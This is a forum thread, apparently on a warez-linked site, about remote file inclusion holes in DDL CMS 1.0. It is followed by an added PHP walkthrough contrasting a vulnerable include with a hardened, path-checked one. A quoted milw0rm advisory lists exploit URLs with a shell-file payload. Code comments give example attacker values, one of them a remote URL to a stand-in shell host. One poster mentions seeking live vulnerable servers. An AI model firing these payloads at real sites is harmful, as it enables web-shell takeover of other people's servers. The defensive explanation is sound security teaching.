    #1
    (╯°□°)╯︵ ┻━┻
    Websites:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of whether that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kinds of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

    #2
    Member
    Websites:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Quote Originally Posted by JmZ View Post
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of whether that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kinds of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
    That makes sense, but are there any servers that actually have that setting on?

    I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded. It seems like a strange method.

    But back to that exploit here it is:
    Code: 
    +============================================================+
    |                                                            |
    | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
    |                                                            |
    +============================================================+
    |                                                            |
    | Author : HxH                                               |
    |                                                            |
    | E-Mail : HxH[at]live[dot]at                                |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Exploit :                                                  |
    |                                                            |
    | /header.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submit.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submitted.php?wwwRoot=[Shell.txt?]                        |
    |                                                            |
    | /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
    |                                                            |
    +============================================================+
    |                                                            |
    | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
    |                                                            |
    +============================================================+
    
    # milw0rm.com [2009-09-21]
    But I tried to find any servers running DDL CMS with this setting on (for testing purposes, not malicious) and couldn't find one.

    Seriously though if we all work together and try and fix any problems the script will be great.
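A worked illustration of the two points made in this thread: JmZ's, that the include path has to be validated in the code irrespective of `allow_url_include`, and the advisory's `wwwRoot=[Shell.txt?]` vector. This is an added example and not DDLCMS's own code; the `$wwwRoot` include pattern, the `config.php` and `header.php` file names, the `theme` parameter and the attacker host in the comments are assumptions made for illustration.

```php
<?php
// Added example (not DDLCMS code): the include pattern the advisory's
// "wwwRoot" vector implies, followed by a hardened form of the same step.
// $wwwRoot, config.php, header.php and the "theme" parameter are assumed.

// --- Vulnerable pattern (hypothetical reconstruction) -------------------
// $wwwRoot is taken straight from the request, so the attacker chooses the
// path of every file included below it.
//   allow_url_include=On : wwwRoot=http://evil.example/shell.txt?   (RFI)
//   allow_url_include=Off: wwwRoot=../../../../tmp/uploaded_avatar   (LFI)
// (attacker values constructed for illustration)
function vulnerable_include(array $get): void
{
    $wwwRoot = $get['wwwRoot'];          // no validation at all
    include $wwwRoot . '/config.php';    // attacker-controlled include path
}

// --- Hardened version ----------------------------------------------------
// 1. Never take the application root from the request; derive it from the
//    location of the script itself.
// 2. If a request-supplied sub-path is unavoidable (e.g. a theme name),
//    allowlist it, map it under that root, and confirm the resolved path
//    is still inside the root before including anything.
define('APP_ROOT', realpath(__DIR__));

function safe_path_under_root(string $userSupplied): ?string
{
    // Refuse anything that looks like a URL or stream wrapper up front:
    // realpath() would fail on them anyway, but fail closed explicitly.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $userSupplied)) {
        return null;
    }
    // Refuse NUL bytes, which truncated include paths in older PHP builds.
    if (strpos($userSupplied, "\0") !== false) {
        return null;
    }
    // Resolve "..", symlinks and duplicate separators to a canonical path.
    $candidate = realpath(APP_ROOT . DIRECTORY_SEPARATOR . $userSupplied);
    if ($candidate === false) {
        return null;                      // missing or unresolvable path
    }
    // Containment check: the resolved path must start with APP_ROOT plus a
    // separator. The separator matters: without it "/var/www/app2" would
    // pass as "inside" "/var/www/app".
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                      // escaped the root via ../ or symlink
    }
    return $candidate;
}

function hardened_include(array $get): void
{
    // Allowlist first: only known theme directories may be selected.
    $allowed = ['default', 'dark'];
    $theme = $get['theme'] ?? 'default';
    if (!in_array($theme, $allowed, true)) {
        $theme = 'default';
    }
    // Then still run the containment check, in case the allowlist is later
    // loosened or a symlink is dropped into the themes directory.
    $dir = safe_path_under_root('themes' . DIRECTORY_SEPARATOR . $theme);
    if ($dir === null) {
        http_response_code(400);
        exit('invalid path');
    }
    include $dir . DIRECTORY_SEPARATOR . 'header.php';
}
```

Two details worth noting. The trailing `?` in the advisory's `[Shell.txt?]` is what makes the vulnerable pattern work over HTTP: whatever the script appends after `$wwwRoot` (here `/config.php`) lands in the query string of the attacker's URL and is ignored, so the fetched file is exactly `shell.txt`. And with `allow_url_include` off, the same parameter still includes any local file the web server can read, which is the point made above about the setting only enabling one form of the bug. The hardened version does not read the root from the request at all, and the `realpath()` plus prefix comparison is the "check it is within the server's directories" step, done on the resolved path rather than by counting `../` segments.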
